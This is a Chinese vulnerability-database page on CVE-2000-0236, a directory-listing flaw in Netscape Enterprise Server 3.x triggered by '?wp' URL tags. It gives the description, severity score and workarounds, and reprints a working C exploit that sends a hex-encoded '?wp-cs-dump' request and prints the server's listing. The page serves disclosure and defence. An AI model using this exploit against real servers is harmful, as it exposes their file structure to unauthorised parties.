CVE-2000-0236
CVSS5.0
发布时间 :2000-03-17 00:00:00
修订时间 :2008-09-10 15:03:41
NMCOE    

[原文]Netscape Enterprise Server with Directory Indexing enabled allows remote attackers to list server directories via web publishing tags such as ?wp-ver-info and ?wp-cs-dump.


[CNNVD]Netscape Enterprise Server 3.x Web Publishing泄露目录列表漏洞(CNNVD-200003-035)

        
        Netscape Enterprise Server是一个Netscape公司开发的Web服务器。
        在Netscape Enterprise Server 3.x版本中的"Web Publishing"(主页发布)功能将允许远程攻击者浏览根目录以及子目录内容。
        远程攻击者可以通过提交一个包含Web Publishing标记的URL(?wp)请求来完成攻击。Netscape Enterprise Server默认安装时,"Directory Indexing"功能是打开的,可以通过禁止目录列表功能来防止上述问题。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:netscape:enterprise_server:3.6Netscape Netscape Enterprise Server 3.6
cpe:/a:netscape:enterprise_server:3.0Netscape Netscape Enterprise Server 3.0
cpe:/a:netscape:enterprise_server:3.5.1Netscape Netscape Enterprise Server 3.5.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0236
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0236
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200003-035
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/templates/archive.pike?list=1&msg=38D2173D.24E39DD0@relaygroup.com
(UNKNOWN)  BUGTRAQ  20000317 [SAFER 000317.EXP.1.5] Netscape Enterprise Server and '?wp' tags
http://www.securityfocus.com/bid/1063
(UNKNOWN)  BID  1063

- 漏洞信息

Netscape Enterprise Server 3.x Web Publishing泄露目录列表漏洞
中危 配置错误
2000-03-17 00:00:00 2006-09-05 00:00:00
远程※本地  
        
        Netscape Enterprise Server是一个Netscape公司开发的Web服务器。
        在Netscape Enterprise Server 3.x版本中的"Web Publishing"(主页发布)功能将允许远程攻击者浏览根目录以及子目录内容。
        远程攻击者可以通过提交一个包含Web Publishing标记的URL(?wp)请求来完成攻击。Netscape Enterprise Server默认安装时,"Directory Indexing"功能是打开的,可以通过禁止目录列表功能来防止上述问题。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 通过管理界面关闭
        选择你的站点,然后选择Content Management->Document Preferences
        将"Directory Indexing" 设置成"none"。
        * 通过修改配置文件关闭
        在obj.conf中查找下列选项:
        Service method="(GET|HEAD)" type="magnus-internal/directory"
        fn="index-common"
        将fn设置成fn="send-error"
        厂商补丁:
        Netscape
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.netscape.com

- 漏洞信息 (19814)

Netscape Enterprise Server 3.0/3.6/3.51 Directory Indexing Vulnerability (EDBID:19814)
multiple remote
2000-03-17 Verified
0 Gabriel Maggiotti
N/A [点击下载]
source: http://www.securityfocus.com/bid/1063/info

Netscape Enterprise Server 3.x includes a poorly documented feature that will allow remote users to view directory listings by appending various instructional tags to the URL. Although it can be disabled, Netscape Enterprise Server is shipped with the "Directory Indexing" feature enabled by default. 

/*
 *	Server:Netscape-Enterprise
 *	This exploit is about Trasversal Vuln.
 *
 *	Written by Gabriel Maggiotti
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define SEND	10000
#define RECIVE	100000


char *str_replace(char *rep, char *orig, char *string)
{
int len=strlen(orig);
char buf[SEND]="";
char *pt=strstr(string,orig);

strncpy(buf,string, pt-string );
strcat(buf,rep);
strcat(buf,pt+strlen(orig));
strcpy(string,buf);
return string;
}

/***************************************************************************/

int main(int argc,char *argv[])
{
int sockfd, numbytes;
char recv_buf[RECIVE];
int port;

char inject[SEND]=
	"\x47\x45\x54\x20\x2f\x3f\x77\x70\x2d\x63\x73\x2d"
	"\x64\x75\x6d\x70\x20\x48\x54\x54\x50\x2f\x31\x2e"
	"\x30\xa\xa";


struct hostent *he;

struct sockaddr_in their_addr;


if(argc!=3)
{
	fprintf(stderr,"usage:%s <hostname> <port>\n",argv[0]);
	exit(1);
}


if((he=gethostbyname(argv[1]))==NULL)
{
	perror("gethostbyname");
	exit(1);
}

port=atoi(argv[2]);



if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
	perror("socket");
	exit(1);
}


their_addr.sin_family=AF_INET;
their_addr.sin_port=htons(port);
their_addr.sin_addr=*((struct in_addr*)he->h_addr);
bzero(&(their_addr.sin_zero),8);



if( connect(sockfd,(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1)
{
	perror("connect");
	exit(1);
}

if(send(sockfd,inject,SEND,0) ==-1)
{
	perror("send");
	exit(0);
}

if( (numbytes=recv(sockfd,recv_buf,RECIVE,0 )) == -1)
{
	perror("recv");
	exit(1);
}

recv_buf[numbytes]='\0';
printf("%s\n",recv_buf);




close(sockfd);

return 0;
}
		

- 漏洞信息

11634
Netscape / iPlanet Multiple Web Publishing Tag Forced Directory Listing
Remote / Network Access Input Manipulation
Loss of Confidentiality Workaround
Exploit Public

- 漏洞描述

- 时间线

2000-03-17 Unknow
2000-03-17 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this vulnerability. It is possible to temporarily work around the flaw by implementing the following workaround: Disable the Directory Indexing feature.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站